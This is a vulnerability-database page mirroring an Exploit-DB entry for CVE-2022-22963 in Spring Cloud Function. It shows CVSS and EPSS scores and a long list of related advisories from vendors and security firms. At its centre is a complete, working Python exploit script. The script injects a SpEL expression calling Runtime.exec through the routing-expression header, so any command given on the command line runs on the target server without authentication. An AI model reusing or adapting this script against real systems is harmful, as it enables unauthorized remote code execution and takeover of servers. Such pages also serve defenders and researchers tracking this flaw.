Lucene search
GatoGamer1155EDB-ID:51577HistoryJul 11, 2023 - 12:00 a.m.
Spring Cloud 3.2.2 - Remote Command Execution (RCE)
2023-07-1100:00:00
GatoGamer1155
www.exploit-db.com
80
exploit
remote command execution
spring cloud 3.2.2
cve-2022-22963
vendor homepage
software link
rce
command execution
vulnerability
security advisory
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
Access Complexity
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)
# Date: 07/07/2023
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://spring.io/projects/spring-cloud-function/
# Description: Exploit to execute commands exploiting CVE-2022-22963
# Software Link: https://spring.io/projects/spring-cloud-function
# CVE: CVE-2022-22963
import requests, argparse, json
parser = argparse.ArgumentParser()
parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)
parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)
args = parser.parse_args()
print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")
headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command }
data = {"data": ""}
request = requests.post(args.url, data=data, headers=headers)
response = json.dumps(json.loads(request.text), indent=2)
print(response)Related
redhat
redhat
(RHSA-2022:1292) Low: Release of OpenShift Serverless 1.21.1
2022-04-11 08:22:04
(RHSA-2022:1291) Low: Release of OpenShift Serverless Client kn 1.21.1
2022-04-11 07:34:16
(RHSA-2022:4880) Moderate: ACS 3.70 enhancement and security update
2022-06-02 02:02:58
osv
osv
CVE-2022-22963
2022-04-01 23:15:13
githubexploit
githubexploit
Exploit for Expression Language Injection in Vmware Spring Cloud Function
2023-01-15 21:39:20
Exploit for Code Injection in Vmware Spring Cloud Function
2022-03-31 14:29:24
Exploit for Expression Language Injection in Vmware Spring Cloud Function
2023-10-28 21:42:38
zdt
zdt
Spring Cloud Function SpEL Injection Exploit
2022-03-31 00:00:00
Spring Cloud 3.2.2 - Remote Command Execution Exploit
2023-07-11 00:00:00
packetstorm
packetstorm
Spring Cloud 3.2.2 Remote Command Execution
2023-07-12 00:00:00
Spring Cloud Function SpEL Injection
2022-03-31 00:00:00
wallarmlab
wallarmlab
Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)
2022-03-31 01:49:02
github
github
saint
saint
Spring Cloud Function Remote Code Execution
2022-04-05 00:00:00
Spring Cloud Function Remote Code Execution
2022-04-05 00:00:00
prion
prion
Remote code execution
2022-04-01 23:15:00
ibm
ibm
redhatcve
redhatcve
CVE-2022-22963
2022-03-31 18:32:29
attackerkb
attackerkb
CVE-2022-22963
2022-04-01 00:00:00
CVE-2021-38406
2021-09-09 00:00:00
akamaiblog
akamaiblog
Spring Cloud Function SpEL Injection (CVE-2022-22963) Exploited in the Wild
2022-03-31 19:30:00
veracode
veracode
Remote Code Execution
2022-03-31 01:51:42
nvd
nvd
CVE-2022-22963
2022-04-01 23:15:13
cvelist
cvelist
CVE-2022-22963
2022-04-01 00:00:00
openvas
openvas
spring
spring
CVE report published for Spring Cloud Function
2022-03-30 00:53:00
cisco
cisco
cve
cve
CVE-2022-22963
2022-04-01 23:15:13
checkpoint_advisories
checkpoint_advisories
Spring Cloud Function Remote Code Execution (CVE-2022-22963)
2022-03-31 00:00:00
nessus
nessus
nuclei
nuclei
Spring Cloud - Remote Code Execution
2022-03-27 14:47:28
metasploit
metasploit
Spring Cloud Function SpEL Injection
2022-03-30 22:38:41
cisa_kev
cisa_kev
VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability
2022-08-25 00:00:00
wizblog
wizblog
kitploit
kitploit
rapid7blog
rapid7blog
Update on Spring4Shellβs Impact on Rapid7 Solutions and Systems
2022-04-01 14:42:42
Metasploit Weekly Wrap-Up
2022-04-01 18:34:29
Whatβs New in InsightVM and Nexpose: Q2 2022 in Review
2022-07-28 14:00:00
paloalto
paloalto
qualysblog
qualysblog
Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability
2022-03-31 09:00:00
Identify Server-Side Attacks Using Qualys Periscope
2022-12-01 23:11:35
fortinet
fortinet
CVE-2022-22965 and CVE-2022-22963 vulnerabilities
2022-04-01 00:00:00
thn
thn
f5
f5
cert
cert
threatpost
threatpost
RCE Bug in Spring Cloud Could Be the Next Log4Shell, Researchers Warn
2022-03-30 18:04:11
cisa
cisa
securelist
securelist
Spring4Shell (CVE-2022-22965): details and mitigations
2022-04-04 15:30:36
avleonov
avleonov
malwarebytes
malwarebytes
4 over-hyped security vulnerabilities of 2022
2022-12-19 01:00:00
mmpc
mmpc
impervablog
impervablog
Imperva Protects from New Spring Framework Zero-Day Vulnerabilities
2022-03-31 15:20:03
mssecure
mssecure
trellix
trellix
The Bug Report β April 2022 Edition
2022-05-04 00:00:00
The Bug Report β April 2022 Edition
2022-05-04 00:00:00
checkpoint_security
checkpoint_security
ics
ics
2022 Top Routinely Exploited Vulnerabilities
2023-08-03 12:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2022
2022-07-19 00:00:00
Oracle Critical Patch Update Advisory - April 2022
2022-04-19 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
Access Complexity
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Related for EDB-ID:51577